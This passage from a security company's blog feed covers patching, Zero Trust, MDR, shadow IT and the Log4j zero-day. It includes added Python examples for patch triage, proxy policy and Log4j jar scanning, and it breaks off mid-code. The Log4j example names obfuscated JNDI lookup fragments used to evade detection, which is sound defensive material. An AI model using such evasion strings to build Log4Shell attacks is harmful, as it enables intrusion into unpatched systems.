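The `12.1-55.282` line run twice, once with `variant="FIPS"` and once without, is the point of the example: the same digits come back as “fixed” on the FIPS train and as “vulnerable” if the appliance is mistaken for a standard 12.1 build, so record the train in your inventory before trusting any automated check.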

OneNeck Can Help!

Given the potential harm this vulnerability could cause an organization, OneNeck recommends installing the updated versions immediately, and our experienced team is here to help. Through our long-standing partnership with Citrix, we will quickly and effectively assess your Citrix appliances and determine which units are affected. We will install all necessary updates so that you can get back to doing what you do best, knowing that you and your clients are protected. So, please Contact Us or your account rep today and let us help you continue to run efficiently, effectively and securely.

Understanding Zero Trust
https://www.oneneck.com/blog/security/understanding-zero-trust/ (Mon, 06 Jun 2022 20:23:30 +0000)

The Zero Trust Network, or Zero Trust Architecture, model was created in 2010 by John Kindervag, who at the time was a principal analyst at Forrester. He defined it as a security concept centered on the belief that an organization should not automatically trust anything inside or outside its perimeters and instead verify anything and everything trying to connect to its systems before granting access.

Cisco lays out the original tenets of a Zero Trust network in a diagram (figure omitted).

At the core, even though Zero Trust has been defined by many in different ways, the message is always the same: allow only “just-in-time access” to resources, whether on premises or in the cloud, and treat all applications and resources as internet-facing. But this concept can send many an IT pro into a spiral. What about critical infrastructure? What about VPNs? How do you do this? Why is this better?

Why all the Zero Trust fuss?

Let’s take a step back and look at why Zero Trust is getting so much traction in the first place. It comes down to a few things: the growth and severity of security incidents in recent years, and how organizations are trying to stop and defend against those threats. The defending teams in organizations (aka “blue teams”) have been losing this war for a while now. Breaches seem to happen more and more, and the adage is not if but when.

So, why the increase in breaches? Security budgets are increasing. More professionals are being trained. More security products are available. It stands to reason that blue teams should be seeing a decline in breaches, but we are not.

Possible reasons abound. Some see the security frameworks we use as the issue. Others blame the changes in access to IT resources since COVID: organizations now have employees and customers accessing data, applications and infrastructure in both cloud and on-premises scenarios, from anywhere. Our older security models made it harder to gain access to those things, perhaps allowed too much access for too long, and did not sufficiently protect our digital identities.

This brings us back to Zero Trust. This new access need, with data in the cloud, in SaaS and on premises, dictated a new security model to meet these requirements. In future blogs, I will break down Zero Trust in more depth, helping you navigate the pros and cons of a Zero Trust approach in your organization. Stay tuned!

Cyber insurance prices are soaring. What should you do?
https://www.oneneck.com/blog/security/cyber-insurance-prices-are-soaring-what-to-do/ (Tue, 26 Apr 2022 23:28:00 +0000)

Cyber insurance is getting harder for companies to find — and it’s likely going to get harder. While cyber insurance is becoming more of a must-have for businesses, the explosion of ransomware and cyberattacks mean it’s also becoming a less enticing business for insurers. (Source: Harvard Business Review)

This quandary puts today’s business in a tough spot. Cyber insurance is important, but premiums are steep (and climbing) and the requirements to qualify keep growing. To keep premiums affordable, insurers require a comprehensive list of good-hygiene security controls. These include:

  • Multifactor authentication (MFA) for remote access and admin/privileged control.
  • Endpoint Detection and Response (EDR).
  • Secured, encrypted and tested backups.
  • Privileged Access Management (PAM).
  • Email filtering and web security.
  • Patch management and vulnerability management.
  • Cyber incident response planning and testing.
  • Cybersecurity awareness training and phishing testing.
  • Hardening techniques including Remote Desktop Protocol (RDP) mitigation.
  • Logging and monitoring/network protections.
  • End-of-life systems replaced or protected.
  • Vendor/digital supply-chain risk management.

While the list above may seem overwhelming, each item is key to maintaining a defense against attack, and together they provide a roadmap for addressing the growing requirements of cyber insurers.

What if cyber insurance isn’t an option?

Having cyber insurance is always an important element to include in a company’s security program. However, we are also seeing situations where coverage may not be obtained because:

  • Insurers are moving away from providing coverage for certain types of ransomware events and/or adding huge increases in deductibles to provide these types of coverage.
  • Customers want to add or obtain coverage for the first time and can’t find an insurer willing to cover them.

When insurance cannot be obtained, the most important response is to invest in the security program.

An effective security program doesn’t always mean more tools.

At OneNeck, we take a different, “non-tool” approach to security first. Instead of starting with point solutions, we align with the Center for Internet Security’s Critical Security Controls (CIS Controls), a framework that provides a prioritized set of actions to address security gaps, and only then map those actions to tools. In fact, we believe so strongly in the CIS Controls that we use them in our own business as a Managed Services Provider (MSP) that must pass rigorous annual compliance audits.

The CIS Controls allow our clients to understand where they are from a security risk perspective and then build out a step-by-step security plan that aligns to their unique environment.

OneNeck – We’ve got your back.

Whether it’s a service, an infrastructure solution or a cloud solution, we are here to help you decide what the best, most-secure course of action should be.

We proactively work with our customers to understand their current security controls and provide recommendations on how to better leverage their current investments in people, process and tools. We then recommend the next investments, which will not only provide better security for their business but also provide a roadmap to address the growing demands of cyber insurers more efficiently and in good time.

Stay Ahead of Threats with Managed Detection & Response
https://www.oneneck.com/blog/security/leverage-managed-detection-and-response-to-stay-ahead-of-threats/ (Mon, 18 Apr 2022 20:43:00 +0000)

We live in an age when passive security isn’t enough to protect company infrastructure. Security solutions must seek out and respond to unknown threats. Managed detection and response (MDR) provides companies with the security capabilities they need for the modern era.

MDR is an outsourced cybersecurity service that seeks out and remediates threats that standard security controls miss. Two factors make MDR services a must-have for organizations. One is the lack of available cybersecurity talent: according to the annual (ISC)² Cybersecurity Workforce Study, there were 2.7 million unfilled cybersecurity positions in 2021. The second is the abundance of data collected at the enterprise level and the need to protect it.

With that in mind, we’ll dive into the challenges MDR solves and the benefits of implementing it in your business.

Seek and Destroy Security Threats With Managed Detection and Response

New technology can make your business more agile, profitable, and capable. However, it can also make security increasingly complex. Since companies need new technologies to thrive, it’s essential to keep security robust enough to handle the change. Consider five challenges managed detection and response addresses.

  1. Lack of cybersecurity talent. MDR counters the talent shortage by providing businesses with access to a fully-trained team of security experts. The outsourced organization handles talent acquisition and training. Thus, organizations get an instant injection of cybersecurity expertise.
  2. Alert fatigue. Teams are often inundated with security alerts, and the sheer volume makes it difficult to sift through the noise and find real threats. MDR lightens the load by using detection and analytics technology to triage and analyze alerts automatically, so analysts see only what needs a human decision.
  3. Protect against lateral movement. Once a bad actor gains access to your system, they’ll attempt to move deeper into your network and increase their control. MDR can detect this activity and limit the impact an attack has on your system.
  4. An increasing number of endpoints. The number of devices your organization has to protect continues to grow. From edge devices to remote-work hardware, your organization needs a holistic approach to security. MDR uses a network intrusion detection system (NIDS) that combines signature-based and behavioral analysis to filter millions of connections. The NIDS then passes the threats that need further inspection to the MDR team.
  5. Access to advanced security technology. An MDR firm uses machine learning and AI technology to analyze and sift through massive amounts of data. This advanced technology is expensive and may be beyond the reach of many organizations. However, when working with an MDR firm, you get access to the advanced toolsets of a dedicated security company.

To sum up, managed detection and response gives teams of all sizes the security expertise and technology needed to protect against modern threats.

Leverage Partner Expertise for Enhanced Security

The security landscape continues to become more complex. Increasingly sophisticated attacks, more endpoints to protect, and talent shortages require innovative security solutions. You need cost-effective solutions that can detect intrusions, malware, and other malicious activity, helping you take rapid action to eliminate or limit the damage.

Finding technology partners to power your applications and protect your data is challenging. OneNeck provides services for your security needs, including MDR, endpoint protection, backup, disaster recovery, and more. For MDR, we partner with Alert Logic to provide you with advanced threat protection.

Here are four benefits you get from this strategic partnership:

  1. Centralized platform. Alert Logic’s platform covers all of your workloads, wherever they may be. Everything is managed from a single location in the cloud.
  2. Threat and response expertise. Work with a team of security researchers, data scientists, and engineers who have years of experience analyzing security threats.
  3. 24/7 monitoring. Your network is being monitored constantly, and OneNeck security experts are alerted within 15 minutes of any critical incident.
  4. Large talent pool. Alert Logic has 150 SOC analysts who partner with OneNeck’s security team to provide you with comprehensive coverage.

Our team helps manage security so you can focus on providing the best service to your customers. Through strategic partnerships, we ensure there are no gaps in your coverage. We have the experience to implement technology solutions for organizations of all sizes. Talk to our team about how you can implement MDR in your business today.


Want to learn more about MDR's critical role in your cybersecurity strategy? Check out the MDR Resource Library.

Why Your Company Should Care About Endpoint Security https://www.oneneck.com/blog/security/why-your-company-should-care-about-endpoint-security/ Thu, 31 Mar 2022 21:35:00 +0000 https://www.oneneck.com/blog/security-why-your-company-should-care-about-endpoint-security/

Businesses are increasingly dependent on technology. And data is essential to the efficiency of that technology as well as future business decisions. With its increased use in business operations comes a larger attack surface. So, shouldn’t companies that prioritize technology also prioritize security?

Yes, especially when you consider how frequently malware is released. The AV-TEST Institute registers over 450,000 new malicious programs and potentially unwanted applications every day. On top of that, remote work has exploded since the beginning of the pandemic. The sheer volume of malware and the growing number of endpoints, especially unknown endpoints from BYOD, has put a spotlight on security concerns.

This new environment has pushed companies to look for advanced security solutions that can protect against more intelligent and widespread malware. Endpoint security is designed to be that advanced solution.

What is endpoint security?

Endpoints are devices connected to your company's network. They range from servers and personal computers to mobile devices and even IoT devices such as smartwatches. When you consider the range of devices, it's easy to see why there are security concerns. But to fully protect enterprise infrastructure, a new layer is needed.

Traditional antivirus software takes a preventative approach to security, intercepting known threats before they enter the system. While this is an important security component, the sheer quantity of malware created daily means that signature databases will always have gaps. Additionally, antivirus software is typically installed and managed at the user level, restricting the control and access capabilities of security admins.

Endpoint security improves on traditional antivirus technologies in several key ways:

  • Continuous detection capabilities. With large amounts of malware created every day, it’s unlikely that your preventative defenses will recognize every threat and be able to defend against them. Endpoint security continuously monitors devices on the network to detect abnormal file behavior, leveraging AI and machine learning. It can then add new malware entries to the cloud for preventative detection.
  • Cloud-based malware registry. Antivirus software used to rely on downloadable databases to keep your software current on the latest malware. However, this process depends on each endpoint pulling updates, which is slower and less reliable. Cloud-based solutions let endpoints share a single database that is always updated with known threats, eliminating security holes from endpoints that are slow to update.
  • Unified admin controls. Managing an organization full of devices is hard enough, but the challenge is multiplied when using varied software solutions and processes. Endpoint security provides a single dashboard for all users and devices. Additionally, security admins have the needed controls to act when threats arise.

By combining preventative security with continuous detection and response capabilities, endpoint security helps companies defend against a growing number of threats.

Secure Your Network with OneNeck and Cisco

Data is one of your business’s most valuable assets and is also one of the most vulnerable. Security admins must protect devices that vary widely and are located in different regions, even more so since COVID has pushed many companies to leverage remote work in their operations. OneNeck partners with best-in-breed partners like Cisco to provide modern endpoint security that helps keep your data safe.

Endpoint protection is designed to prevent known threats, detect new ones, and respond to eliminate them promptly. Cisco Secure Endpoint uses the cloud to provide the latest threat intelligence, as well as advanced algorithms to detect new threats and rapidly respond to them — isolating the endpoint to mitigate damage and remediating malware across all devices.

Cisco Secure Endpoint brings together endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities in a unified solution, and it eliminates the need to manage separate solutions for complete coverage while simplifying deployment and management tasks.

OneNeck Simplifies the Integration of Your Security Solution

Security is essential, but we realize it’s only one piece of your network. Time is limited, and you need solutions that work reliably and reduce the complexity. OneNeck can advise you on the strategies and solutions you need to keep your endpoints safe and protect your data. Contact us to learn how you can protect against threats in real-time.

The Importance of an Upfront Cybersecurity Policy Framework https://www.oneneck.com/blog/security/upfront-cybersecurity-policy-framework/ Sat, 12 Mar 2022 02:34:00 +0000 https://www.oneneck.com/blog/security-upfront-cybersecurity-policy-framework/

Organizations are in a hurry to mature their cybersecurity programs. Whether it is world events, prior incidents, or just the desire to be security conscious that is driving these efforts, there is one thing that makes these efforts less complicated along the journey – develop your cybersecurity policy framework first.

Developing a policy framework to support your cybersecurity program can seem daunting and is often left for last when prioritizing a 2-, 5- or even a 10-year roadmap. By creating a policy framework at the beginning of your roadmap, you lay the foundation for decision making that can be followed and referenced during the project lifetime and beyond.

A strong policy foundation will help facilitate the tracking, guidance, and enforcement of your cybersecurity program. Building a policy framework can be as simple as starting with one policy that encompasses the most important aspects of your cybersecurity infrastructure. The Center for Internet Security (CIS) has a great template to use when starting this effort.

Check out this CIS example of a completed Information Security Policy, which can be used as a template by editing details to better reflect your organizational environment.

As you develop your program’s policy framework, be sure to…

  • Build in requirements for annual reviews (at minimum) to ensure your policies are adapting to organizational changes and technological advancements.
  • Also consider that as your policies mature, it may be necessary to document supplemental processes, standards, guidelines, etc., to fully support your policies.

By creating a simple policy framework at the beginning of your roadmap, you create the guidance necessary for configuring tools, training employees, protecting data, and more. Having a policy framework already available lets you build out your program to match your policy, instead of trapping yourself into writing policy based on your program after it is implemented.

We’ve got your back.

If you’re not sure where to start with your security framework and would like to talk with one of OneNeck’s security experts, we are here to help.

Conflict in Ukraine is raising cyber risk for organizations https://www.oneneck.com/blog/security/conflict-over-ukraine-is-raising-cyber-risk-for-us-organizations/ Fri, 25 Feb 2022 03:58:00 +0000 https://www.oneneck.com/blog/security-conflict-over-ukraine-is-raising-cyber-risk-for-us-organizations/

As the world watches Russia's conflict with Ukraine, US service providers like OneNeck that operate critical infrastructure are watching closely, as cyber risk increases with any physical conflict. The FBI, CISA and the National Security Agency put out a joint advisory in January about potential cyberthreats against US critical infrastructure. CISA also warned US companies to protect their IT systems against destructive wiper malware, which has been used against targets in Ukraine.

At OneNeck, our security teams across the OneNeck/TDS organization are closely monitoring the events related to this conflict. As a telecommunications and service provider, we count ourselves as a key contributor to critical infrastructure. We have been evaluating all alerts from CISA for the last several months, and we are constantly evaluating our security posture in alignment with those alerts.

Overall, our core strategy is to stay disciplined and stay the course on previously assessed risk-reduction activities while increasing awareness of and visibility into potential threats in this emerging area. We have a solid foundation of controls that are monitored in the environment, and multiple additional controls are in the process of being implemented to further reduce risk, in line with CISA's Shields Up recommendations.

The following are some key activities that teams across our organization have been performing in preparation:

  • Reviewing CISA advisories, briefings and checklists of protections to ensure recommended controls are in place and operating effectively.
  • Implementing increased threat monitoring of potential suspicious activities.
  • Reviewing security vendor advisories and verifying increased threat monitoring in security tools is activated.
  • Increasing communications to our associates on heightened awareness.
  • Reviewing security risk mitigation objectives to determine if any priorities should shift.

Since traffic can easily come from anywhere in the world, it is incredibly important to have a full security program, and as CISA recommends, at a minimum…

  • Update your operating system and software.
  • Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
  • Make an offline backup of your data.
  • Use multifactor authentication (MFA).

OneNeck – We’ve got your back.
We know these can be stressful times, so if you’d like to talk with one of OneNeck’s security experts regarding this situation and ensure your security defenses are sufficient to keep you safe, we are here to help.

Ransomware is still a top threat, especially in healthcare https://www.oneneck.com/blog/security/ransomware-is-the-top-security-threat-for-healthcare/ Tue, 22 Feb 2022 19:32:00 +0000 https://www.oneneck.com/blog/security-ransomware-is-the-top-security-threat-for-healthcare/

Ransomware continues to be the top threat to today's organizations, with healthcare topping the list of verticals most at risk, putting millions of patients' personal and financial data at risk, according to a recent threat summary report from Cisco Talos. Additionally, healthcare facilities are uniquely affected when breached: it's not just dollars lost, as with manufacturing or enterprise, lives are potentially at stake.

The pandemic has further exacerbated security risks and strained IT teams at healthcare organizations as they’ve increased their remote work and telemedicine, making them even more vulnerable to bad actors. So, what should healthcare IT leaders do to ensure they’re not the next big news story?

OneNeck CISO, Katie McCullough, says, “Per the HIPAA Security Rule, the first step in identifying and implementing safeguards that keep healthcare organizations safe is to conduct a risk assessment. It’s foundational in protecting electronic health information. At OneNeck, our approach is to evaluate a healthcare organization’s current security capabilities against the Center for Internet Security’s recently published version 8 CIS Controls, and to provide an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of their electronic protected health information.”

The Security Rule regulations addressed in this assessment are divided into administrative, physical, and technical safeguards.

  • Administrative Safeguards:
    • Risk management process
    • Security personnel
    • Information access management
    • Workforce training and management
    • Periodic assessments
  • Physical Safeguards:
    • Facility access and control
    • Workstation and device security
  • Technical Safeguards:
    • Access control
    • Audit control
    • Integrity controls
    • Transmission security
    • Encryption

Katie continues with, "As the most-targeted industry, today's healthcare organizations can't afford to not proactively address these critical security safeguards. There's just too much at stake. But don't go it alone. An experienced security partner like OneNeck can bring the outside perspective and deep industry knowledge that will help a healthcare organization identify their risks and prioritize a mitigation plan that will keep the bad guys out and keep sensitive patient information safe."

Want to talk to a OneNeck security professional? We’re here to help.

Benefits of a 30-day Patching Cycle https://www.oneneck.com/blog/security/benefits-of-a-30-day-patching-cycle/ Mon, 14 Feb 2022 22:25:00 +0000 https://www.oneneck.com/blog/security-benefits-of-a-30-day-patching-cycle/

Maintaining your organization's security is an ongoing process that never ends. With security threats constantly evolving, your defenses have to evolve too. That's why many organizations choose to work with a managed service provider like OneNeck, which offers technology expertise at a scalable cost and built-in security processes that keep customers safe from attack.

As OneNeck’s CISO, I lead the directive on patching frequency, and I’m often asked what goes into determining the timing of our patching schedule. When it comes to patching, we follow an every-30-day approach, and here’s why…

Consideration 1
Patching for vulnerabilities requires some risk analysis to understand and balance the cybersecurity risk against the business functionality risk. The analysis needs to consider the severity and impact of the vulnerability being patched, as well as the potential adverse or unintended impact on users and on business applications or processes. For most vulnerabilities, a 30-day patching cycle allows time both to assess the patches being released and to do proper business testing.

Additionally, statistics in annual breach reports show that most vulnerability exploits succeed against devices that have gone unpatched for months or years (see the chart from the Verizon 2021 Data Breach Investigations Report).

However, for zero-day vulnerabilities the severity and impact can be significant, and we completely agree that waiting up to 30 days is not sufficient. Frequently, a zero-day vulnerability is already being actively exploited by bad actors; the cybersecurity risk is therefore known to be high, the risk to business functionality is recognized, and patching happens immediately.

OneNeck's process for zero-day vulnerabilities includes same-day notification to customers. Within 24 hours, our technical teams assess vendor-provided workarounds or patches (if available), and our security teams assess the vulnerability for known exploits or other mitigating factors. If the factors warrant immediate patching, OneNeck provides that recommendation to customers and schedules the Change Record based on the customer's business approval.

Consideration 2
At OneNeck, we highly recommend and work with our customers to take a Defense in Depth approach to cybersecurity. Defense in Depth refers to an approach in which a series of security mechanisms and controls are purposefully layered throughout a computer network to protect the confidentiality, integrity, and availability of the network and the data within.

These security controls include vulnerability management, which defines the need for timely patching, but also heuristic anti-malware protection, responsive 24x7 security monitoring, boundary control, and identity and access management, to name a few. With Defense in Depth properly adopted, our perspective is that you can then take the appropriate time to do the risk analysis for patching, balancing the cybersecurity risk against the business functionality risk.

Exceptions to the Rule
There are always exceptions: zero-day vulnerabilities as noted above, a particular business-critical device, or a device to which Defense in Depth cannot be applied. In those situations a more aggressive patch cycle should be considered. For good security hygiene, OneNeck aligns with global security frameworks such as the Center for Internet Security's CIS Controls, whose guidelines recommend performing operating system updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
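
The rules above (regular 30-day cycle, immediate handling for actively exploited zero-days, a shorter cycle for the exceptions) reduce to a small triage function. The example below is added here and is not OneNeck's tooling; the 1-day and 7-day windows, the finding labels and the inventory are assumptions chosen to illustrate the post's reasoning, not published SLAs.

```python
"""Patch-window triage encoding the risk-analysis rules in this post: actively
exploited (zero-day) findings go immediately, the listed exceptions get a
shorter cycle, everything else rides the regular 30-day cycle; assets left
unpatched for months surface first. Added example; the 1-day and 7-day
figures are assumptions for illustration, not OneNeck's published SLAs."""
from dataclasses import dataclass
from datetime import date, timedelta

REGULAR_CYCLE_DAYS = 30      # monthly cadence, in line with CIS Control 7 guidance
EXCEPTION_CYCLE_DAYS = 7     # assumed "more aggressive" cycle for the exceptions
ZERO_DAY_CYCLE_DAYS = 1      # same-day notification, assessment inside 24 hours


@dataclass(frozen=True)
class Finding:
    asset: str
    finding_id: str           # placeholder label, not a real CVE identifier
    cvss: float
    fix_released: date        # when the vendor patch or workaround became available
    exploited_in_wild: bool   # the post's zero-day case: attackers actively exploiting it
    business_critical: bool
    defense_in_depth: bool    # compensating controls (EDR, segmentation, 24x7 monitoring) cover the asset


def patch_window_days(f):
    """Days allowed between fix availability and deployment."""
    if f.exploited_in_wild:
        return ZERO_DAY_CYCLE_DAYS
    if f.business_critical or not f.defense_in_depth:
        return EXCEPTION_CYCLE_DAYS
    return REGULAR_CYCLE_DAYS


def triage(findings, today):
    """One row per finding, earliest due date first, ties broken by CVSS."""
    rows = []
    for f in findings:
        window = patch_window_days(f)
        due = f.fix_released + timedelta(days=window)
        rows.append({
            "asset": f.asset,
            "finding": f.finding_id,
            "cvss": f.cvss,
            "window_days": window,
            "due": due,
            "overdue_days": max(0, (today - due).days),
            "unpatched_days": (today - f.fix_released).days,   # the "months/years" signal
        })
    rows.sort(key=lambda r: (r["due"], -r["cvss"]))
    return rows


# constructed inventory for the example
TODAY = date(2022, 2, 14)
FINDINGS = [
    Finding("web01", "finding-a", 9.8, TODAY - timedelta(days=3), True, False, True),
    Finding("erp01", "finding-b", 7.5, TODAY - timedelta(days=10), False, True, True),
    Finding("ws042", "finding-c", 8.8, TODAY - timedelta(days=20), False, False, True),
    Finding("legacy-ot", "finding-d", 6.5, TODAY - timedelta(days=400), False, False, False),
]

if __name__ == "__main__":
    for r in triage(FINDINGS, TODAY):
        status = f"{r['overdue_days']}d overdue" if r["overdue_days"] else f"due {r['due']}"
        print(f"{r['asset']:<10} {r['finding']:<10} cvss {r['cvss']:<4} "
              f"window {r['window_days']:>2}d  unpatched {r['unpatched_days']:>3}d  {status}")
```

Note that the clock starts at `fix_released`, not at scan time, and that the lowest-CVSS finding in the constructed inventory lands at the top: a 6.5 on a device that cannot be covered by Defense in Depth and has sat unpatched for over a year is the profile the breach reports describe, and it is overdue by more than a year under the exception cycle.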

We’re here to help.
Maintaining a hardened security posture can weigh on the most seasoned IT professional, but you don’t have to go it alone. As a managed services provider, we’ve seen it all, and as a security services provider, we’ve helped many customers prevent, detect and respond to cyberthreats. So, let us know how we can help. We’ve got your back!

How to Mitigate the Negative Effects of Shadow IT https://www.oneneck.com/blog/how-to-mitigate-negative-effects-of-shadow-it/ Thu, 06 Jan 2022 23:00:00 +0000 https://www.oneneck.com/blog/how-to-mitigate-negative-effects-of-shadow-it/

Your company may fear shadow IT because it limits its visibility into the applications on your network. Many organizations take the easiest path, which is to ban the use of any unapproved applications. However, this strategy may prove ineffective and even limit the productivity of your people.

Employees typically install unapproved applications because they’re trying to be more productive, not for any malicious reason. Still, these applications present a security risk, since it’s likely that employees will occasionally send sensitive information using these mediums — leaving IT with no way to mitigate risk.

This situation presents your IT team with a challenge. How can they ensure that the company’s network remains secure while empowering employees to do their best work?

Bring Balance to Your Shadow IT Mitigation

Most CIOs and IT professionals recognize that they will inevitably have a certain amount of shadow IT. But, when there is a culture of transparency and flexibility, it encourages employees to work with IT and bring this situation under control. If employees know that they will not be listened to and the company will block their efforts, they are unlikely to communicate their application needs. How can your business counteract this tendency?

The first step is to open the doors of communication. Show employees that you’re listening by integrating applications when possible and educating them on alternatives when it’s not. This attention to their needs will confirm your company is listening and reduce the number of employees who work around the company’s security policies.

Business leaders should also acknowledge that shadow IT can be a symptom of employees who feel that they don’t have all the tools they need. Instead of reprimanding them, IT can strive to figure out why they work around security policies. This understanding will help them implement controls that allow applications to be used with certain safeguards.


Using policies and software to manage apps that aren’t part of your organization’s tech stack is a great way to mitigate shadow IT. It has the two-fold benefit of showing employees you care about their needs and helping them improve productivity. While enabling some applications will be impossible, there are many instances where IT leaders can say yes.

Your team can limit shadow IT risk by using software controls that limit the access of certain applications. For example, IT can enable employees to download from a particular platform without letting users upload files. This allows users to access necessary documents from business partners and customers while ensuring sensitive information isn’t shared on that platform.

Another way to protect against shadow IT risk is to control which instances of applications employees can access. For example, you can allow employees to access their corporate Google account while restricting access to a personal account where they could accidentally upload sensitive data.
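
Both controls described above (download-only access to a tolerated file-sharing app, and corporate-instance-only access to a sanctioned one) are decisions a forward proxy or CASB makes per request. The example below is added here and is not a OneNeck configuration; the hostnames, the corporate domain `example.com`, the app categories and the `Request` shape are assumptions. For the Google Workspace case it sets the `X-GoogApps-Allowed-Domains` header, which Google documents for blocking sign-ins to consumer accounts through a TLS-inspecting proxy.

```python
"""Policy decision for a forward proxy or CASB, enforcing the two controls
described above: download-only access to tolerated file-sharing apps, and
corporate-instance-only access to Google Workspace, with unknown apps logged
for IT review. Added example; hostnames, the corporate domain and the app
categories are assumptions, not a OneNeck configuration."""
from dataclasses import dataclass, field

CORPORATE_DOMAINS = ["example.com"]           # assumed corporate Workspace domain
# Header Google Workspace documents for blocking consumer accounts via a proxy
GOOGLE_TENANT_HEADER = "X-GoogApps-Allowed-Domains"

DOWNLOAD_ONLY = {"www.dropbox.com", "dl.dropboxusercontent.com", "wetransfer.com"}  # tolerated, read-only
BLOCKED = {"pastebin.com"}                    # assumed: apps that cannot be enabled safely
WRITE_METHODS = {"POST", "PUT", "PATCH"}


@dataclass(frozen=True)
class Request:
    host: str
    method: str
    path: str
    content_length: int = 0
    content_type: str = ""


@dataclass
class Decision:
    action: str                   # "allow" or "block"
    reason: str
    add_headers: dict = field(default_factory=dict)
    review: bool = False          # surface to IT as possible shadow IT


def looks_like_upload(req):
    """A write method carrying a body. A bodiless POST (e.g. a login form) passes,
    so read access to the app keeps working."""
    return req.method in WRITE_METHODS and (
        req.content_length > 0 or req.content_type.startswith("multipart/"))


def decide(req):
    host = req.host.lower()
    if host == "google.com" or host.endswith(".google.com"):
        # Corporate instance only: Google rejects sign-ins to accounts outside
        # the listed domains when it sees this header (proxy must TLS-inspect).
        return Decision("allow", "sanctioned app; corporate instance enforced",
                        {GOOGLE_TENANT_HEADER: ",".join(CORPORATE_DOMAINS)})
    if host in BLOCKED:
        return Decision("block", "app on the blocked list")
    if host in DOWNLOAD_ONLY:
        if looks_like_upload(req):
            return Decision("block", "upload to a download-only app")
        return Decision("allow", "download-only app; read access")
    # Anything else is shadow IT until someone looks at it. Allow-and-log keeps
    # people productive while giving IT the visibility the post asks for.
    return Decision("allow", "unknown app; logged for IT review", review=True)


if __name__ == "__main__":
    for req in (
        Request("drive.google.com", "GET", "/file/d/abc/view"),
        Request("www.dropbox.com", "GET", "/s/xyz/report.pdf"),
        Request("www.dropbox.com", "POST", "/upload", 1048576, "multipart/form-data"),
        Request("unknown-saas.example.net", "GET", "/"),
    ):
        d = decide(req)
        print(f"{req.method:<5} {req.host:<26} -> {d.action:<6} {d.reason} {d.add_headers}"
              + ("  [review]" if d.review else ""))
```

The upload heuristic is deliberately coarse (write method plus a body); a real CASB matches the app's actual upload endpoints instead. The same tenant-restriction idea exists for Microsoft 365 through the `Restrict-Access-To-Tenants` header, and both only work when the proxy terminates TLS, so the header can be injected.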

Creating a culture of transparency and integration is a great goal. However, it’s essential that your team have the tools they need to detect and isolate shadow IT applications that are a security risk for your organization. Your tech stack should include software that helps IT monitor the network to identify possible security gaps. When your team and software work in unison, IT will have the visibility and control they need to ensure security requirements are met.

Collaborate with IT Leaders to Empower Your Employees

Disconnects between IT and business leaders can inhibit your team’s ability to support employee needs. This reality makes it essential for your company to include IT in important business conversations, especially those that have to do with computing infrastructure and applications. IT can then communicate the shortcomings they perceive in the organization’s systems and tools.

Shadow IT shouldn’t be shut down without a thought. Acting this way can have a damaging effect on employee productivity and morale. Instead, companies should find a way to open up communication and embrace a culture where shadow IT can be approved and secured.

CIOs are pivotal in fostering collaboration between IT and employees. They safeguard the company through carefully developed procedures without making security feel like a dystopian overlord. However, you may realize that you lack the necessary cloud tools to empower employees. OneNeck can help you integrate needed technologies into your tech stack securely and ensure they are ready to scale as needed. Contact us to learn more.

Zero-day Vulnerability for the Apache Log4j Java Library https://www.oneneck.com/blog/security/zero-day-vulnerability-apache-log4j-java-library/ Sat, 11 Dec 2021 03:32:00 +0000 https://www.oneneck.com/blog/security-zero-day-vulnerability-apache-log4j-java-library/

There is a new zero-day vulnerability for the Apache Log4j Java library, and it is being actively attacked right now. The bug, now tracked as CVE-2021-44228 and dubbed Log4Shell or LogJam, is an unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1. There are many applications this can and will affect, from a variety of open source projects to vendor-supplied solutions.

Here are some of the major Apache frameworks affected by this vulnerability. Many applications use these frameworks, and many more use the log4j library directly.

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink

Mitigations exist, so seek guidance from the vendor for any vendor-supported applications you are running. There is also a thread discussing mitigations for this issue.

We are advising our customers to identify which Java-based applications in their environment are affected, starting with anything that is internet facing. This zero-day is being actively exploited right now.

Current recommendations (as of Dec 20) are:

  • log4j v1: Version 1.x of log4j is end of life and has its own RCE vulnerabilities (such as CVE-2019-17571). If you're using it, you need to migrate to 2.17.0.
  • log4j v2.x: Internet-facing systems running log4j 2.16.0 or earlier should be prioritized first, but all impacted systems should migrate to 2.17.0. Version 2.16.0 resolves the RCE but is vulnerable to a new denial-of-service attack.
  • Can't update? Additional mitigations include removing or disabling Log4j, deploying a WAF, network isolation, and configuration changes, depending on the software and vendor recommendations. See the sources below for additional information or check vendor websites for software-specific recommendations.
  • Sources for these recommendations:
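
Two checks for the response described in the recommendations above, as an added example that is not part of OneNeck's post: a scanner that classifies a log4j-core jar by version (using the Dec 20 thresholds, 2.16.0 for DoS-only and 2.17.0 as the target) and by whether `JndiLookup.class` has been removed from it, plus a best-effort detector for JNDI lookup strings in web server logs that also collapses the nested-lookup obfuscations (`${lower:j}`, `${::-j}`) used to evade naive string matching. The jar contents and the access-log lines are constructed for the example; `scan_tree` is the part you would point at a real application server.

```python
"""Two checks for the Log4Shell response described above: classify a log4j-core
jar by version and by whether JndiLookup.class is still present, and flag JNDI
lookup strings (including common obfuscations) in web server logs.
Added example, not from the advisory; version thresholds follow the Dec 20
guidance in this post (migrate to 2.17.0)."""
import io
import re
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.0-beta9' -> (2, 0, 0, 0, 9); '2.14.1' -> (2, 14, 1, 1, 0).
    The fourth field orders pre-releases before the final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:alpha|beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    return (major, minor, patch, 0, int(m[4])) if m[4] else (major, minor, patch, 1, 0)


FIRST_VULN = parse_version("2.0-beta9")   # start of the CVE-2021-44228 range
DOS_ONLY = parse_version("2.16.0")        # RCE fixed, DoS remains
FIXED = parse_version("2.17.0")


def classify_version(version):
    v = parse_version(version)
    if v < FIRST_VULN:
        return "log4j 1.x: end of life with its own RCE issues, migrate to 2.17.0"
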